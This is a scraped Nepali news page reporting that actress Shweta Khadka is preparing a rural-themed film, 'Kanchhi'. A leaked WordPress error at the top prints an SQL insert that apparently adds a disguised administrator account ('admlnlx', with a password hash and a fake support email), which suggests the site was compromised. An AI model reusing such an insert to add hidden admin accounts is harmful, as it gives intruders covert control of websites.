WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bu.4gvP8Nz3L/m5BwlqRfXr7dvchKG1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-21 11:59:31', '', 'admlnlx', 'admlnlx')
चितवन,फागुन ५-
अभिनेत्री श्वेता खड्का ‘कान्छी’ बन्ने भएकी छिन् । श्वेताले आफ्नो होम प्रोडक्सनमा ‘कान्छी’ नामक फिल्म निर्माणको तयारी गरेकी छिन् । स्व. अभिनेता श्रीकृष्ण श्रेष्ठकी पत्नी श्वेता ०७१ को सुपरहिट फिल्म ‘कोहिनुर’पछि पर्दामा देखिएकी छैनन् ।
केही समयपछि प्रदर्शन मितिसहित कान्छीबारे विस्तृत जानकारी दिन्छौँ,’ उनले भने, ‘ग्रामीण परिवेशको कथामा कान्छी बनाउँदै छाँै । अहिलेसम्म श्वेताजी र दयाहाङ राई मात्र फाइनल भएका छन् ।’